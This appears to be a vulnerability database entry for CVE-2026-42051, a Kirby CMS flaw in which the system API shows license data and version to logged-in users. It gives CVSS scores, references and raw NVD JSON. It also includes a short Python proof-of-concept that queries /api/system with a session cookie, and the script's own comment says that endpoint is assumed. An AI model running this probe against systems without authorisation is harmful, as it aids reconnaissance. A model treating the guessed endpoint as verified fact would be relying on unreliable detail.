CVE-2026-42051

Description

Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, the system API endpoint leaks license data and installed version to authenticated users. This issue has been patched in versions 4.9.0 and 5.4.0.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:* - VULNERABLE

Kirby < 4.9.0

Kirby < 5.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_cve_2026_42051(target_url, session_cookie):
    """
    PoC for CVE-2026-42051
    Checks if the Kirby CMS API leaks license and version info.
    """
    headers = {
        "Cookie": session_cookie,
        "User-Agent": "Mozilla/5.0 (PoC Scanner)"
    }
    
    # Assuming the endpoint is /api/system or similar, based on description
    endpoint = f"{target_url.rstrip('/')}/api/system"
    
    try:
        response = requests.get(endpoint, headers=headers, timeout=10)
        if response.status_code == 200:
            data = response.json()
            # Check if sensitive keys exist in response
            if 'license' in data or 'version' in data:
                print(f"[+] Vulnerability Confirmed!")
                print(f"    Version: {data.get('version')}")
                print(f"    License Data: {data.get('license')}")
                return True
        print("[-] Vulnerability not detected or endpoint changed.")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

# Usage
# check_cve_2026_42051("http://target-kirby-site.com", "kirby_session=xyz123")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-42051
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-42051
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-42051/
[4] VulDB https://vuldb.com/cve/CVE-2026-42051
[5] https://github.com/getkirby/kirby/releases/tag/4.9.0
[6] https://github.com/getkirby/kirby/releases/tag/5.4.0
[7] https://github.com/getkirby/kirby/security/advisories/GHSA-x68m-c7jf-2572

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-42051", "sourceIdentifier": "[email protected]", "published": "2026-05-09T04:16:22.110", "lastModified": "2026-05-18T13:01:29.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kirby is an open-source content management system. Prior to versions 4.9.0 and 5.4.0, the system API endpoint leaks license data and installed version to authenticated users. This issue has been patched in versions 4.9.0 and 5.4.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.9.0", "matchCriteriaId": "1BB5394F-37F9-4A53-9CE7-79548F674886"}, {"vulnerable": true, "criteria": "cpe:2.3:a:getkirby:kirby:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.4.0", "matchCriteriaId": "B2D943B9-CD71-45FE-A1A4-158603C3502E"}]}]}], "references": [{"url": "https://github.com/getkirby/kirby/releases/tag/4.9.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/releases/tag/5.4.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/getkirby/kirby/security/advisories/GHSA-x68m-c7jf-2572", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}